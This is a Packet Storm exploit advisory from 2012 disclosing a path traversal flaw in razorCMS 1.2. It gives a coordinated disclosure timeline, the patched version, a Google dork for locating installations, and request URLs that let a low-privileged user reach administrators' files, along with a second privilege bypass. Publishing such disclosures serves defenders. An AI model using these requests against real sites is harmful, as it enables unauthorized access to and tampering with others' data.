exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

razorCMS 1.2 Path Traversal

razorCMS 1.2 Path Traversal
Posted Jan 11, 2012
Authored by chap0

razorCMS version 1.2 suffers from a path traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | fbdb12c80c98de27931f125ae507349c1cf96ff75958e03c5bd73d20de3149d2

razorCMS 1.2 Path Traversal

Change Mirror Download
# Exploit Title: razorCMS 1.2 Path Traversal
# Google Dork: "Powered by razorCMS"
# Date: January 10, 2012
# Author: chap0
# Software Link: http://www.razorcms.co.uk/archive/core/
# Version: 1.2
# Tested on: Ubuntu
# Patch: Upgrade to latest release 1.2.1
# Greetz To: <Insert Name Here>

RazorCMS is vulnerable to Path Traversal, when logged in with
a least privileged user account the user can access the
administrator's and super administrator's directories and
files by changing the path in the url. The vulnerabilities exist
in admin_func.php

Patch Time line:
Dec 11, 2011 - Contacted Vendor
Dec 11, 2011 - Vendor Replied ask for details of vulnerability
Dec 12, 2011 - Submitted details
Dec 13, 2011 - No reply asked for an update
Dec 13, 2011 - Vendor Replied asking for a week or two for a fix after the holiday period
Dec 20, 2011 - Emailed Vendor for an update
Dec 21, 2011 - Vendor confirmed vulnerabilities asked for two weeks time for a fix
Dec 27, 2011 - Emailed vendor some "temp fixes" for the vulnerabilities discovered
Jan 3, 2012 - Emailed vendor more "temp fixes"
Jan 5, 2012 - Vendor replied sent a new updated file v1 admin_func.php
Jan 5, 2012 - Replied to vendor discovered more vulnerabilities
Jan 6, 2012 - Vendor response with new file with fixes v2 admin_func.php
Jan 6, 2012 - Tested discovered more vulnerabilities
Jan 8, 2012 - Vendor replied with new file v3 admin_func.php
Jan 8, 2012 - Tested, vulnerabilities are fixed reported to vendor
Jan 9, 2012 - Vendor released update 1.2.1
Jan 10, 2012 - Public Disclosure

Path Traversal Details:

The following files and directories are vulnerable to Path Traversal
Attack including any files or directories that the admin or super admin
may create within these directories

http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/
http://razorcms-server/admin/?action=filemanview&dir=backup/
http://razorcms-server/admin/?action=filemanview&dir=/razor_data.txt
http://razorcms-server/admin/?action=filemanview&dir=/index.htm


http://razorcms-server/admin/?action=fileman&dir=razor_temp_logs/
http://razorcms-server/admin/?action=fileman&dir=backup/
http://razorcms-server/admin/?action=fileman&dir=/razor_data.txt
http://razorcms-server/admin/?action=fileman&dir=/index.htm


An example would be if the super admin created a directory within razor_temp_logs
named sekrit which should not be accessible with a least privileged user, the
least privileged user can change the path as shown below:

http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/sekrit/

Which also works on files within those directories which the user should not have
access to which at this point gives the user access to view, edit, rename, move,
copy and delete the file.

e.g.

http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/sekrit/sekrit.txt


Another vulnerability exist in this version of razorCMS, if a least privileged user creates
a directory with their logged in credentials, and then deletes the directory, the user will
then have access to the administrative directories and files.


Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    9 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close